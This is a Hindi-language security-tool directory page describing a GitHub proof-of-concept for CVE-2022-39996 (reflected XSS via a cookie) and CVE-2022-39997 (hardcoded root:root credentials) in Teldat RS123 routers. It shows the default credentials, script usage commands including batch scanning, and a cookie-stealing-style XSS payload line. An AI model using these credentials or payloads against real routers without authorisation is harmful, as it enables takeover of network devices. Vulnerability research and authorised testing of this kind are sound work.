Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Teldat-Router-CVE-2022-POC — CVE-2022-39996 (Reflected XSS) और CVE-2022-39997 (Weak Password) के लिए POC, Teldat RS123/RS123w Router में | Kitploit
उपकरण/GitHubGitHub/uyhacked/teldat-router-cve-2022-poc
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubuyhacked/teldat-router-cve-2022-poc

Teldat-Router-CVE-2022-POC

CVE-2022-39996 (Reflected XSS) और CVE-2022-39997 (Weak Password) के लिए POC, Teldat RS123/RS123w Router में

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

टेल्डैट राउटर CVE-2022-39996 और CVE-2022-39997 POC

टेल्डैट RS123 / RS123w राउटर्स में खोजी गई दो कमजोरियों का प्रूफ ऑफ कॉन्सेप्ट।

अवलोकन

CVE आईडीप्रकारCWECVSSगंभीरता
CVE-2022-39996परावर्तित XSSCWE-796.1मध्यम
CVE-2022-39997कमज़ोर पासवर्डCWE-5219.8गंभीर

प्रभावित उत्पाद: टेल्डैट RS123, RS123w राउटर


CVE-2022-39997 - कमज़ोर पासवर्ड

विवरण

टेल्डैट RS123/RS123w राउटर root:root के हार्डकोडेड डिफ़ॉल्ट क्रेडेंशियल्स के साथ आते हैं। प्रशासक अक्सर इन्हें अपरिवर्तित छोड़ देते हैं, जिससे अप्रमाणित हमलावरों को टेलनेट, SSH, HTTP या अन्य सेवाओं के माध्यम से पूर्ण प्रशासनिक पहुंच प्राप्त करने की अनुमति मिलती है।

प्रमाण

root@kitploit:~
Account: root
Password: root

Weak Password POC

उपयोग

root@kitploit:~
pip install requests paramiko

# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1

# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all

# Batch scan
python CVE-2022-39997.py -f targets.txt

CVE-2022-39996 - परावर्तित XSS

विवरण

/upgrade/index.html एंडपॉइंट, cmd HTTP कुकी के मान को बिना सैनिटाइज़ेशन के प्रतिक्रिया में प्रतिबिंबित करता है। एक हमलावर cmd कुकी में जावास्क्रिप्ट युक्त एक दुर्भावनापूर्ण अनुरोध तैयार कर सकता है। जब कोई प्रमाणित प्रशासक पेज पर जाता है, तो स्क्रिप्ट राउटर के वेब इंटरफ़ेस के ब्राउज़र संदर्भ में निष्पादित होती है, जिससे सत्र अपहरण या कॉन्फ़िगरेशन में हेरफेर संभव हो जाता है।

प्रमाण

  • cmd कुकी में XSS पेलोड तैयार करना:

XSS POC 1

  • ब्राउज़र में XSS ट्रिगर किया गया:

XSS POC 2

उपयोग

root@kitploit:~
pip install requests

# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1

# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root

# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi

# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc

# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"

फ़ाइलें

फ़ाइलविवरण
CVE-2022-39997.pyकमज़ोर पासवर्ड का पता लगाना (टेलनेट / SSH / HTTP / FTP)
CVE-2022-39996.pycmd कुकी के माध्यम से परावर्तित XSS का पता लगाना
Teldat's Router Vulnerability.mdपूर्ण कमजोरी प्रकटीकरण रिपोर्ट

अस्वीकरण

ये POC स्क्रिप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए हैं। उन प्रणालियों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें